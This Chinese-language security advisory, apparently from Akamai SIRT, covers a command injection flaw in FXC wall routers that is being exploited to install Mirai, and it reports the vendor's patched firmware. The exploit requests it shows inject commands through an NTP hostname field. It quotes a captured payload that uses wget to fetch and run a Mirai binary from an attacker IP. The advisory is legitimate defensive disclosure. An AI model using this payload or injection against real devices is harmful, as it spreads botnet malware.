FXC 路由器中被频繁利用的漏洞:已修复,有补丁可用
SIRT 发表的上一篇博文探讨了 InfectedSlurs 活动,而本博文是对上述博文的更新。
执行摘要
由于受影响的厂商之一已发布安装了补丁的固件版本和相关指南,Akamai 安全智能响应团队 (SIRT) 对 InfectedSlurs 公告系列进行了更新。
为此漏洞分配的 CVE ID 为 CVE-2023-49897 ,其 CVSS v3 评分为 8.0。
受影响的路由器包括 Future X Communications (FXC) 的 AE1021 和 AE1021PE 插座式墙壁路由器,它们运行的固件版本为 2.0.9 及更低版本。
在现实环境中捕获的恶意攻击负载会安装基于 Mirai 的恶意软件,进而创建 分布式拒绝服务 (DDoS) 僵尸网络。
我们在原始研究中提供了一个包含各种 攻击迹象 (IOC)、Snort 规则和 YARA 规则 的列表,以帮助确定现实环境中的这些漏洞利用尝试以及防御者网络中可能存在的活跃感染。
您需要了解的内容
作为发现 InfectedSlurs 的一部分,SIRT 发现了 FXC AE1021 和 AE1021PE 插座式墙壁路由器中存在一个正在被频繁利用的漏洞。据介绍,此设备是专为酒店和住宅单位打造的插座式无线 LAN 路由器。它由 FXC 在日本制造。为此漏洞分配的 CVE ID 为 CVE-2023-49897,其 CVSS v3 评分为 8.0。
借助该漏洞,经过身份验证的攻击者可以通过对管理接口发出的 POST 请求来传送攻击负载,进而实现操作系统命令注入。在其当前配置中,它会利用已捕获的有效负载中的设备默认凭据。
受影响的固件版本为:
AE1021PE 固件版本 2.0.9 及更低版本
AE1021 固件版本 2.0.9 及更低版本
该厂商 (FXC) 已发布安装了补丁的设备固件版本来修复该漏洞,并建议设备所有者尽快将固件升级到版本 2.0.10。此外,他们还建议所有者对设备进行出厂重置,然后在首次启动时更改默认的管理界面登录密码。
如需查看该厂商的相关公告,请访问 https://www.fxc.jp/news/20231206 ,并且 JPCERT 也发布了一则公告,您可以在 https://jvn.jp/en/vu/JVNVU92152057/ (日文版: https://jvn.jp/vu/JVNVU92152057/)上进行查看。
观察到的漏洞利用情况
在现实环境中发现的攻击负载会安装基于 Mirai 的恶意软件。该攻击活动正在构建一个旨在为 DDoS 攻击提供帮助的僵尸网络。有关该僵尸网络的详细信息,您可以查看 我们最初的博文。
难以估算现实环境中有多少设备可能会被入侵或已被积极入侵,因为捕获的攻击负载依赖于设备是否使用出厂的默认身份验证凭据。
由于攻击者必须通过身份验证,因此我们观察到攻击者进行了两种独特的交互。我们认为,第一种交互仅仅是指纹识别尝试。该交互使用默认凭据并以 /cgi-bin/login.apply 端点 URL 为目标(图 1)。
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
图 1:FXC 插座式墙壁路由器身份验证尝试
如果身份验证成功,大约三秒后漏洞利用攻击负载会被传送到 /cgi-bin/action 端点 URL(图 2)。
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
图 2:FXC 插座式墙壁路由器漏洞利用尝试
在现实环境中捕获到的原始漏洞利用攻击负载尝试利用操作系统命令注入漏洞来传播 Mirai 的 MIPS 编译变体(图 3)。
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
图 3:在现实环境中观察到的远程代码执行攻击负载
在 我们最初的文章中,Akamai SIRT 团队提供了一个包含各种 IOC、Snort 规则和 YARA 规则的列表,以帮助确定现实环境中的这些漏洞利用尝试以及防御者网络中可能存在的活跃感染。
结论
针对物联网 (IoT) 的攻击活动导致出现了无数的案例,在这些案例中日常消费设备无意中参与了很多恶意活动。DDoS、 僵尸网络 和加密货币挖矿方案只是一些潜在结果,这些结果可能在设备受影响的消费者完全不知情的情况下发生。在某些情况下,用户甚至可能完全不知道可以更改这些设备上的凭据。
通过此发现,我们认识到必须提高普通消费者对物联网最佳实践和相关风险的意识并加强相关教育。需要提高意识的并不限于消费者,生产这些“设置后便忘记不管”的设备的制造商也需要提高意识。
基本安全实践很重要
基本内容很重要。 我们所观察到的种种问题再次强调了基本安全最佳实践的重要性,例如在初始设置期间更改设备上的默认密码。 此外,这也让我们认识到必须实施更强大的长期、主动安全协议,例如确保对系统进行一致更新以抵御潜在攻击,并且需要偶尔检查系统/设备,尤其是在它们出现异常行为时。
关注最新动态
Akamai 安全情报组将继续监控此类威胁并及时进行报告,以提高我们的客户和安全社区的整体安全意识。有关更多研究内容, 请关注我们的微信公众号,及时获取我们所掌握的最新情况。
对于 CISA、US-CERT、JPCERT 和 FXC 在沟通、协调、确认、修复和披露方面给予的帮助,Akamai SIRT 深表感谢。
我们也在此向横滨国立大学的 Ryu Kuki、 Takayuki Sasaki和 Katsunari Yoshioka 表示感谢, 感谢他们的 辛勤工作。虽然我们并未与他们进行直接合作,但我们注意到,他们向 JPCERT 和 FXC 报告同一漏洞的时间和我们大致相同。很高兴能够找到与我们志趣相投、共同积极改善并提升互联网环境和安全性的防御者。
